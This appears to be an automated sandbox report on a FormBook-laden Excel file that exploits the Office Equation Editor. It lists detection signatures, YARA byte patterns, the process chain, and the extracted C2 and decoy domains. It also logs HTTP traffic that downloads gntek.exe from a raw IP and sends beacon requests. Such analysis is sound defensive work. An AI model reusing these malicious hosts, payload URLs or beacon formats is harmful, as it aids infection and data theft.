
Windows Analysis Report
W6902.xlsx

Overview

General Information

Sample Name: W6902.xlsx
Analysis ID: 562479
MD5: 9a0e6f87707210a385ef8ed3bf348de3
SHA1: 800a9f004b17cd24413eb98c2f6d9fcd02128887
SHA256: 41b58cddca86e32e7034daf8e97dcdaa04ac6cdcb41eae86be1c3fa7fd05c871
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2868 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1836 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2612 cmdline: "C:\Users\Public\vbc.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
      • vbc.exe (PID: 448 cmdline: "C:\Users\Public\vbc.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2556 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 2540 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Source | Rule | Description | Author | Strings
00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.4e0000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.2.vbc.exe.4e0000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Exploits

          Source: Network Connection | Author: Joe Security | Data: DestinationIp: 212.192.246.120, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1836, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1836, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe

          System Summary

          Source: Process started | Author: Florian Roth | Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1836, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2612
          Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2556


          AV Detection

          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 | Avira URL Cloud: Label: malware
          Source: http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 | Avira URL Cloud: Label: malware
          Source: www.dreamschools.online/b80i/ | Avira URL Cloud: Label: phishing
          Source: http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 | Avira URL Cloud: Label: malware
          Source: http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 | Avira URL Cloud: Label: malware
          Source: http://212.192.246.120/gntek.exe | Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe | ReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll | ReversingLabs: Detection: 46%
          Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe | Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
          Source: 7.2.msdt.exe.2b1796c.4.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.4e0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.4.unpack | Avira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.1.unpack | Avira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpack | Avira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.msdt.exe.41fb58.0.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.2.unpack | Avira: Label: TR/Patched.Ren.Gen2

          Exploits

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.462720602.0000000000430000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504101247.0000000000720000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504998016.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.464331880.0000000000590000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000007.00000002.669422875.0000000002610000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.503886261.0000000002240000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000002.669567128.0000000002790000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.504934771.0000000002480000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: vbc.exe, 00000005.00000002.505482723.0000000002580000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000003.502497513.0000000002480000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.501834417.0000000002380000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
          Source: global traffic | DNS query: name: www.927291.com
          Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
          Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 212.192.246.120:80
          Source: excel.exe | Memory has grown: Private usage: 4MB later: 66MB

          Networking

          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          Source: C:\Windows\explorer.exe | Network Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exe | Domain query: www.mollyagee.com
          Source: C:\Windows\explorer.exe | Domain query: www.youngliving1.com
          Source: C:\Windows\explorer.exe | Network Connect: 1.32.255.137 80
          Source: C:\Windows\explorer.exe | Domain query: www.zoharfine.com
          Source: C:\Windows\explorer.exe | Domain query: www.teentykarm.quest
          Source: C:\Windows\explorer.exe | Network Connect: 172.217.168.19 80
          Source: C:\Windows\explorer.exe | Network Connect: 194.5.156.29 80
          Source: C:\Windows\explorer.exe | Domain query: www.927291.com
          Source: Malware configuration extractor | URLs: www.dreamschools.online/b80i/
          Source: Joe Sandbox View | ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
          Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global traffic | HTTP traffic detected: GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1 | Host: www.927291.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1 | Host: www.teentykarm.quest | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1 | Host: www.zoharfine.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1 | Host: www.mollyagee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 1.32.255.137 1.32.255.137
          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 28 Jan 2022 06:21:53 GMT | Accept-Ranges: bytes | ETag: "b7739b57f14d81:0" | Server: Microsoft-IIS/10.0 | Date: Fri, 28 Jan 2022 21:37:20 GMT | Content-Length: 254186
          Source: global traffic | HTTP traffic detected: GET /gntek.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 212.192.246.120 | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 28 Jan 2022 21:38:38 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.10.3 (Ubuntu) | Date: Fri, 28 Jan 2022 21:38:43 GMT | Content-Type: text/html | Content-Length: 178 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
          Source: unknown | TCP traffic detected without corresponding DNS query: 212.192.246.120
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
